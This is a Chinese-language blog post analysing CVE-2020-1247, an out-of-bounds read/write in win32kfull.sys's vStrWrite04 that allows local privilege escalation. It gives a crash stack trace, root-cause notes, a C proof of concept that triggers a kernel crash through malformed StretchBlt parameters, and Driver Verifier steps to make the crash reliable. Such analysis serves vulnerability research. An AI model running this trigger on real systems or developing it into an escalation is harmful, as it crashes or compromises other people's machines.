CVE-2020-1247漏洞分析

0x00漏洞信息

漏洞影响:本地提权

漏洞文件:win32kfull.sys

漏洞函数:vStrWrite04

漏洞原因:越界读写

分析系统:Windows 1903

0x01漏洞分析

崩溃时的堆栈:

 nt!KiBugCheckDebugBreak+0x12
 nt!KeBugCheck2+0x952
 nt!KeBugCheckEx+0x107
 nt!MiSystemFault+0x1d3171
 nt!MmAccessFault+0x34f
 nt!KiPageFault+0x360
 win32kfull!vStrWrite04+0x93
 win32kfull!EngStretchBltNew+0xc88
 win32kfull!EngStretchBlt+0xd1
 win32kfull!EngStretchBltROP+0x319
 win32kfull!BLTRECORD::bStretch+0x37e
 win32kfull!GreStretchBltInternal+0x721
 win32kfull!NtGdiStretchBlt+0x68

 

vStrWrite04 函数在对传入参数a3 取地址时未验证地址是否合法 就直接引用导致蓝屏 往前追溯发现
win32kfull!EngStretchBltROP+2BD 位置 在调用SURFMEM::bCreateDIB 时 67.left+24 取地址加0x50 是一个未申请内存。导致后面引用到+0x50对象就会造成越界读写

CVE-2020-1247漏洞分析-1

 

 0x02验证poc

#include <Windows.h>


int main()
{
    BITMAPINFO bi = { {0x28, 0x2, 0xfffffffffffffffb, 0x2, 0x4, 0x0, 0x0, 0x0, 0x0, 0x0, 0x2} };
    char out[0x1000] = { 0 };
    HDC r0 = CreateCompatibleDC(0x0);
    HBITMAP r1 = CreateDIBitmap(r0, 0x0, 0x6, &out, &bi, 0x0);
    SelectObject(r0, r1);
   // __debugbreak();
    StretchBlt(r0, 0x0, 0x0, 0x8, 0x8, r0, 0x0, 0x0, 0xffffffffffffffeb, 0x4, 0xee00e6);

    return 0;
}

在运行poc 前需要开启特殊池 不然很难触发 因为越界读取只有4个字节  需要添加特殊池来稳定触发

打开Verifier

CVE-2020-1247漏洞分析-2

 

CVE-2020-1247漏洞分析-3

 

CVE-2020-1247漏洞分析-4

 

CVE-2020-1247漏洞分析-5

 

CVE-2020-1247漏洞分析-6

 

完成后重启就可以稳定触发漏洞


系统教程

全球首发:Tiny10 2023 x86最终版及类似win10精简版/Win K/N版 单独添加Windows Media Player功能

2023-7-31 0:04:48

系统教程

Windows下x86和x64平台的Inline Hook介绍

2023-7-31 0:13:05

个人中心
今日签到
有新私信 私信列表
搜索